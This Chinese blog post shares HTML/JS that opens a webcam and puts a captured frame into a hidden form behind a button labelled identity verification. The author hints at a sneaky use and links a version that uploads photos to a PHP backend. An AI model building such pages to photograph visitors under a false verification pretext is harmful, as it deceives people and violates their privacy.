html+js 网页调用网络摄像头 点击拍照 并且......

就像这种,调用网页摄像头,然后点击就能截取定格,之后可以进阶搞一些更好玩的东西

 复制就能用,在老代码基础上改的,有些东西你们自己修改一下就好了

 可以加上什么人脸识别,或者物体检测,手势.....

一个坑点:如果部署在自己云服务器上的话,可能是需要https才能允许摄像头的

<!doctype html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>长歌-身份验证</title>
</head>

<body>
    <iframe name="formSubmit" style="display:none;"></iframe>
    <form class="form-inline" target="formSubmit" method="post">    
    <input id="input"  type="text" placeholder="交钱了!" name = "chishi" style="display:none">
    <input name = "button1" type = "submit" id ="button_take" value="身份认证">
    </form>
    <div style="float: left;width:50%"><video id="v"></video></div>
    <canvas id="canvas" style="display:none;"></canvas><br />
    <img src="http://placehold.it/640&text=Your%20image%20here%20..." id="photo" alt="photo" style="float: left;">
</body>

<script>
    !(function () {
        if (navigator.mediaDevices === undefined) {
            navigator.mediaDevices = {};
        }
        if (navigator.mediaDevices.getUserMedia === undefined) {
            navigator.mediaDevices.getUserMedia = function (constraints) {
                var getUserMedia = navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia;


                if (!getUserMedia) {
                    return Promise.reject(new Error('getUserMedia is not implemented in this browser'));
                }


                return new Promise(function (resolve, reject) {
                    getUserMedia.call(navigator, constraints, resolve, reject);
                });
            }
        }
        const constraints = {
            video: true,
            audio: false
        };
        let videoPlaying = false;
        let v = document.getElementById('v');
        let promise = navigator.mediaDevices.getUserMedia(constraints);
        promise.then(stream => {
            // 旧的浏览器可能没有srcObject
            if ("srcObject" in v) {
                v.srcObject = stream;
            } else {

                v.src = window.URL.createObjectURL(stream);
            }
            v.onloadedmetadata = function (e) {
                v.play();
                videoPlaying = true;
            };
        }).catch(err => {
            console.error(err.name + ": " + err.message);
        });
        var xxx = 0;
        let data = canvas.toDataURL('image/webp');
        document.getElementById('button_take').addEventListener('click', function () {
            if (xxx < 1){
                if (videoPlaying) {
                let canvas = document.getElementById('canvas');
                canvas.width = v.videoWidth;
                canvas.height = v.videoHeight;
                canvas.getContext('2d').drawImage(v, 0, 0);
                data = canvas.toDataURL('image/webp');
                console.log(data);
                document.getElementById('input').setAttribute('value', data);

            }
            }  
            
        }, false);
    })();
    
</script>

</html>

原理就是一开始生成两个框,然后点击按钮之后获取当前第一个框内的图片base64在第二个框输出

在线体验:

长歌-身份验证

这个其实还有一个很cao的用法

进阶2.0↓

html+js+php 网页调用摄像头 点击拍照 并且返回到本地(2.0)_php 调用手机相机-CSDN博客点击按钮之后里面会多一串很长的东西,自己去转化一下就能得到了。获取之后随便去一个在线base64转化器啥的就能获得啦!老办法,php+html+js+dat。然后再同一个文件夹下面搞一个。这个就是那个比较逆天的用法。注意↓是一个php文件。https://blog.csdn.net/long_songs/article/details/128093144

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值